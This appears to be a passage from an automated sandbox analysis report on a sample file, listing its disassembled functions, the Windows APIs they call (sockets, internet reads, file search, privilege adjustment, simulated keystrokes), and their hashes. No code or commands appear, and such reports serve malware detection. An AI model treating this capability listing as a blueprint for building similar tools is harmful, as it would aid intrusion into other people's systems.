Instruction ID: 8c6165a07437d9c67f4189b47fd10ab158f1f5143121c3b6c231630925b39114
Opcode Fuzzy Hash: 1ae85254a74b87ce24020f3967ccf7c30205ecbdc2c3e31a71cd4fc5911afacd
Instruction Fuzzy Hash: 60321475A007059FC728CF69C4809AAB7F1FF49320B15C56EE59ADB3A2EB70E941CB44

Function 0067923B Relevance: 7.6, APIs: 5, Instructions: 146networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0067A82C: inet_addr.WSOCK32(00000000), ref: 0067A84E

socket.WSOCK32(00000002,00000002,00000011), ref: 00679296
WSAGetLastError.WSOCK32(00000000,00000000), ref: 006792B9

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: ErrorLastinet_addrsocket
String ID:
API String ID: 4170576061-0
Opcode ID: 55889b9b52fdbe4741a8cf62f18b18ae8783d7ad9f773eff7fb6aa0368179c27
Instruction ID: cdd0a2137a2732e03b783b5867c579c3cb57b09c368cf73a97f9a45063d3adca
Opcode Fuzzy Hash: 55889b9b52fdbe4741a8cf62f18b18ae8783d7ad9f773eff7fb6aa0368179c27
Instruction Fuzzy Hash: F241C270600610AFDB54BB68C852E7E77EEEF45724F04844CF956AB3D2CA749D018BA5

Function 0066EB60 Relevance: 7.6, APIs: 5, Instructions: 125fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 0066EB8A
_wcscmp.LIBCMT ref: 0066EBBA
_wcscmp.LIBCMT ref: 0066EBCF
FindNextFileW.KERNEL32(00000000,?), ref: 0066EBE0
FindClose.KERNEL32(00000000,00000001,00000000), ref: 0066EC0E

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: Find$File_wcscmp$CloseFirstNext
String ID:
API String ID: 2387731787-0
Opcode ID: c15e03d4d2c5028f2c4bc175abaec186fd0b19018db56f122d5bfa8f584f255e
Instruction ID: 23876adce3b941405c1ae15b49260310d8b0461a947b793b4152ba9d4980af6d
Opcode Fuzzy Hash: c15e03d4d2c5028f2c4bc175abaec186fd0b19018db56f122d5bfa8f584f255e
Instruction Fuzzy Hash: 0441AF796007028FCB08DF68C491A99B3E6FF49324F10455EE96A8B3A1DB32B945CF95

Function 00688111 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 00688160
IsWindowEnabled.USER32 ref: 0068816E
GetForegroundWindow.USER32(?,?,00000001), ref: 0068817B
IsIconic.USER32 ref: 00688189
IsZoomed.USER32 ref: 00688197

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: 5c862785e7ee65294edf5c844c440505d59cad611f044bc4b65b307c5d6e9c12
Instruction ID: eb9afad4764c549ff41c7cba1ceab14a4186b74d753e6b22a8f87b818e47d93d
Opcode Fuzzy Hash: 5c862785e7ee65294edf5c844c440505d59cad611f044bc4b65b307c5d6e9c12
Instruction Fuzzy Hash: 73116D317006126FE7217F26DC48AAFBB9BEF55760F445529F88AD7241CF34A9028BA4

Function 0063E01E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,0063E014,75920AE0,0063DEF1,006BDC38,?,?), ref: 0063E02C
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 0063E03E

Strings

kernel32.dll, xrefs: 0063E027
GetNativeSystemInfo, xrefs: 0063E038

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetNativeSystemInfo$kernel32.dll
API String ID: 2574300362-192647395
Opcode ID: b8e58b045497f450584aec1c25051c03856bfe2c53133d6c41775faf7dc74099
Instruction ID: cea86d0d64b6909bd271953a69a6327da7af5bd96714f67662be6e8abe26ff30
Opcode Fuzzy Hash: b8e58b045497f450584aec1c25051c03856bfe2c53133d6c41775faf7dc74099
Instruction Fuzzy Hash: 35D0A7708007139FC7355F61EC0865277D7AF21300F19441BE482D2790DBB4DC808EA0

Function 00633B70 Relevance: 5.9, Strings: 4, Instructions: 903COMMON

Download Yara Rule

Strings

n, xrefs: 0069701F
n, xrefs: 006340A4
@, xrefs: 00634176
n, xrefs: 006340EC

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: Exception@8Throwstd::exception::exception
String ID: @$ n$ n$ n
API String ID: 3728558374-1613168149
Opcode ID: e8813cdb1a5727bf155c352eb0f48eb91057d81278a1e7d44d3d793443d72b41
Instruction ID: 9a6a207a2fd46539918bfc1029d9638f2161fb92d4c2620944c06cdc57bfcc3b
Opcode Fuzzy Hash: e8813cdb1a5727bf155c352eb0f48eb91057d81278a1e7d44d3d793443d72b41
Instruction Fuzzy Hash: 0B728B70E042199BCF14DF94C481AEEB7BBEF48310F14805AE909AB391DB75AE46CBD5

Function 0063B11F Relevance: 4.9, APIs: 3, Instructions: 377COMMON

Download Yara Rule

APIs

Part of subcall function 0063B34E: GetWindowLongW.USER32(?,000000EB), ref: 0063B35F

DefDlgProcW.USER32(?,?,?,?,?), ref: 0063B22F

Part of subcall function 0063B55D: DefDlgProcW.USER32(?,00000020,?,00000000), ref: 0063B5A5

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: Proc$LongWindow
String ID:
API String ID: 2749884682-0
Opcode ID: 82f8ec74bbf5eddd649fd39bdc7d3d7f8547a50ff93a333e0a835a29282bc2b3
Instruction ID: 72348f72f82247f34ab80308d5a86a5d30aecfdfc4db33aa309cb5cfa87cf40e
Opcode Fuzzy Hash: 82f8ec74bbf5eddd649fd39bdc7d3d7f8547a50ff93a333e0a835a29282bc2b3
Instruction Fuzzy Hash: CBA16E70514105BAEF28AF294C88DFF295FEB46740F14531DF602D6A91DB269E02E3F6

Function 00674EB5 Relevance: 4.7, APIs: 3, Instructions: 155networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,006743BF,00000000), ref: 00674FA6
InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00674FD2

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: Internet$AvailableDataFileQueryRead
String ID:
API String ID: 599397726-0
Opcode ID: 95a108cd037c6f0055ca740fd6116a426e129930c76f98ac944ecc2361befd56
Instruction ID: 326bf37e5884c9fdc56e152f0ed74f457cca945eeb9e439ccf51829e9d95db30
Opcode Fuzzy Hash: 95a108cd037c6f0055ca740fd6116a426e129930c76f98ac944ecc2361befd56
Instruction Fuzzy Hash: 2A41D871504209BFEB10DE94CC85EFF77BEEB80764F10806EF60AA6241EBB59E41D694

Function 006277B0 Relevance: 4.6, APIs: 1, Strings: 1, Instructions: 1076COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00627921

Strings

\Qm, xrefs: 006A1028

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: _memmove
String ID: \Qm
API String ID: 4104443479-172261174
Opcode ID: 547d2714178258f336c0bd9d3aff238bd231589e63a4aa93254f011fc9ad791e
Instruction ID: 049eb78736858273de7bb02dded6b9bcfee74889dbfb3e26f7ef394cd58d8900
Opcode Fuzzy Hash: 547d2714178258f336c0bd9d3aff238bd231589e63a4aa93254f011fc9ad791e
Instruction Fuzzy Hash: CDA24C70E04629CFDB24CF58D880AEDB7B2BF59314F2581A9D859AB390D7349E82DF50

Function 0066E1FD Relevance: 4.6, APIs: 3, Instructions: 72COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0066E20D
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0066E267
SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0066E2B4

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: ErrorMode$DiskFreeSpace
String ID:
API String ID: 1682464887-0
Opcode ID: 99111389826e7ca3f64d6e44724be569652d50650181a2c2dfb2ca0f1c3ed36f
Instruction ID: 921605801c6078027deaf68cd860c682707e5f570f16ba20fc23aa966a98abc5
Opcode Fuzzy Hash: 99111389826e7ca3f64d6e44724be569652d50650181a2c2dfb2ca0f1c3ed36f
Instruction Fuzzy Hash: 78216075A00618EFCB00EFA5D894AEDBBBAFF49310F0484A9E905A7351DB31A905CF54

Function 0065B134 Relevance: 4.6, APIs: 3, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 0063F4EA: std::exception::exception.LIBCMT ref: 0063F51E
Part of subcall function 0063F4EA: __CxxThrowException@8.LIBCMT ref: 0063F533

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0065B180
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0065B1AD
GetLastError.KERNEL32 ref: 0065B1BA

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
String ID:
API String ID: 1922334811-0
Opcode ID: 376ddf9365d0350b391bdd5b983ec1daca8be1692508a336567a372bc7ca0be6
Instruction ID: a6ddb06e895f89d4cd8065252a1b596652a45271df8f9d61551f74bb2d02ff74
Opcode Fuzzy Hash: 376ddf9365d0350b391bdd5b983ec1daca8be1692508a336567a372bc7ca0be6
Instruction Fuzzy Hash: 4711BCB2800604AFE728AF64DC85D6BB7AEEB44311F20852EE45697241DB70FC458BA0

Function 00666606 Relevance: 4.6, APIs: 3, Instructions: 58fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00666623
DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 00666664
CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0066666F

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle
String ID:
API String ID: 33631002-0
Opcode ID: 2363f2a8dfbab8a9d65b3aca59e6c4a00c56212f15901ecb813d2978b52fc90d
Instruction ID: 22c94590567cf001855f5d010c2c748974d1fdaf985623bc6d07e989a20302df
Opcode Fuzzy Hash: 2363f2a8dfbab8a9d65b3aca59e6c4a00c56212f15901ecb813d2978b52fc90d
Instruction Fuzzy Hash: AE115E71E01228BFDB109FA4EC44BAEBBBDEB45B10F104156F900F6290D3B06E018BA1

Function 006671FA Relevance: 4.5, APIs: 3, Instructions: 42memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00667223
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0066723A
FreeSid.ADVAPI32(?), ref: 0066724A

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: fe0a00d0c0de7abedfb2bed9af6b18a39fdcb64d6d857427dff0766f0ec4db84
Instruction ID: 9960f676c4abed2db6f1cf3120d4bbaedce5ab05e77121f15b5a039ea45203ba
Opcode Fuzzy Hash: fe0a00d0c0de7abedfb2bed9af6b18a39fdcb64d6d857427dff0766f0ec4db84
Instruction Fuzzy Hash: D4F01D76A04209BFDF04DFF4DD99AEEBBBDFF09205F105469A602E2591E370AA448B10

Function 0066F56F Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 0066F599
FindClose.KERNEL32(00000000), ref: 0066F5C9

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 8cb0b5fbbcc36b3e8c88ad31a642f63cd50cf880a47b41f8ad24a7cc794dfd83
Instruction ID: b77fa68e950be6c179f08593002d5309caffeff3cabf292313b674536233adc4
Opcode Fuzzy Hash: 8cb0b5fbbcc36b3e8c88ad31a642f63cd50cf880a47b41f8ad24a7cc794dfd83
Instruction Fuzzy Hash: 381161716046019FDB10EF28D845A2EB7EAFF99324F00891EF8A6D7291DB30AD058B95

Function 0066CE7A Relevance: 3.0, APIs: 2, Instructions: 30windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,0067BE6A,?,?,00000000,?), ref: 0066CEA7
FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,0067BE6A,?,?,00000000,?), ref: 0066CEB9

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 461902a6242b5930500345b602fd336c9abaa4c1fb247c1af5c16fbba516347e
Instruction ID: 3e990db0d9d4c302d1aad6f7c987a465fc8dde27d34f7b092d5d4651ea2ba180
Opcode Fuzzy Hash: 461902a6242b5930500345b602fd336c9abaa4c1fb247c1af5c16fbba516347e
Instruction Fuzzy Hash: 2EF08231500329BBDB10ABA4DC49FFA777EBF09361F004165F955D6181D670AA40CFA0

Function 0066411C Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON

Download Yara Rule

APIs

SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00664153
keybd_event.USER32(?,75A8C0D0,?,00000000), ref: 00664166

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: InputSendkeybd_event
String ID:
API String ID: 3536248340-0
Opcode ID: 728d6c75df76800295fbe397186693f34aeec905b10b739f67926171d2d7e567
Instruction ID: 857113c21731c2214032ce664ab00d597735a8dca1ceedd5f52f019ae22ecbdc
Opcode Fuzzy Hash: 728d6c75df76800295fbe397186693f34aeec905b10b739f67926171d2d7e567
Instruction Fuzzy Hash: 62F0677080024DAFDB059FA0C805BBEBBB1EF01305F00800AF966A6292D7799612DFA0

Function 0065AB84 Relevance: 3.0, APIs: 2, Instructions: 22COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,0065ACC0), ref: 0065AB99
CloseHandle.KERNEL32(?,?,0065ACC0), ref: 0065ABAB

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: fc39821fbdfc092f75cf569b88d383774a3075a4dd787627cd13ca571f2f8ba5
Instruction ID: 3a2c8a9380b95b447654a191531a8ceec377d38674e52fc87c7c53e4bc0b7c99
Opcode Fuzzy Hash: fc39821fbdfc092f75cf569b88d383774a3075a4dd787627cd13ca571f2f8ba5
Instruction Fuzzy Hash: 0FE0E675400510AFE7652F54EC05DB7BBEBEF05321F10852DF85B81870D7626C90DB94

Function 006481AC Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,0000000E,00646DB3,-0000031A,?,?,00000001), ref: 006481B1
UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 006481BA

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: e7b712d3f524be9bbd1d9998fd78565a13bbf595dd1c4abd799f1c7fd14408e4
Instruction ID: f80289f798d342a6a1e93043f2c583973289f5a172519efecd1dfbab86b0d9cd
Opcode Fuzzy Hash: e7b712d3f524be9bbd1d9998fd78565a13bbf595dd1c4abd799f1c7fd14408e4
Instruction Fuzzy Hash: E5B09231044608FBDF003BA1EC09B587F6AEB0B652F005010F60E848618B7264108F92

Function 0064D1B9 Relevance: 2.1, APIs: 1, Instructions: 645COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 36a4d818598fd310a2e0b10631e53d7860a71f17329989567711a11fada8c3ee
Instruction ID: 2cb7f1dad1ab8753be05632085ebb6ba63ea75108a0aead342bcc1c116e28a93
Opcode Fuzzy Hash: 36a4d818598fd310a2e0b10631e53d7860a71f17329989567711a11fada8c3ee
Instruction Fuzzy Hash: A0320461D29F014DD7239634D872336A28AAFB73D4F15E737E81AB5AA6EB29C4C34100

Function 006296C0 Relevance: 2.1, APIs: 1, Instructions: 573COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: __itow__swprintf
String ID:
API String ID: 674341424-0
